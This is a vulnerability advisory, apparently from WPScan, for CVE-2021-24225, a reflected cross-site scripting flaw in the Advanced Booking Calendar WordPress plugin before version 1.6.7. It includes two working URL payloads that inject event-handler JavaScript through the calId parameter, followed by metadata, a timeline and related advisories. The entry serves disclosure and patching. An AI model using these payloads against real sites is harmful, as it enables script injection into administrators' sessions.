Advanced Booking Calendar < 1.6.7 – Authenticated Reflected Cross-Site Scripting (XSS) | CVE 2021-24225 | Plugin Vulnerabilities

Description

The plugin did not sanitise the calId GET parameter in the "Seasons & Calendars" page before outputing it in an A tag, leading to a reflected XSS issue

Proof of Concept

Payloads:
- Original reporter: /wp-admin/admin.php?page=advanced-booking-calendar-show-seasons-calendars&setting=calNotDeleted&calId=aaaaaaaa%22+onclick%3Dalert%28123%29%3B%2F%2F

- WPScanTeam: /wp-admin/admin.php?page=advanced-booking-calendar-show-seasons-calendars&setting=calNotDeleted&calId=a%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28%2FXSS%2F%29+b%3D%22

Affects Plugins

advanced-booking-calendar

Fixed in 1.6.7

References

CVE

URL

https://plugins.trac.wordpress.org/changeset/2503971/

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

iohex

Submitter

iohex

Submitter twitter

Verified

Yes

WPVDB ID

25ca8af5-ab48-4e6d-b2ef-fc291742f1d5

Timeline

Publicly Published

2021-03-28 (about 3 years ago)

Added

2021-03-28 (about 3 years ago)

Last Updated

2021-03-30 (about 3 years ago)

Other

Published

Title

Published

2011-09-27

Title

Zenlite < 4.4 - XSS

Published

2022-05-10

Title

Quotes llama < 1.0.0 - Admin+ Stored Cross-Site Scripting

Published

2023-07-07

Title

Video Gallery < 1.3.13 - Admin+ Stored XSS

Published

2023-06-02

Title

Multiple plugins by vcita - Contributor+ Stored Cross-Site Scripting

Published

2023-06-27

Title

Catalyst Connect Zoho CRM Client Portal < 2.1.0 - Admin+ Stored XSS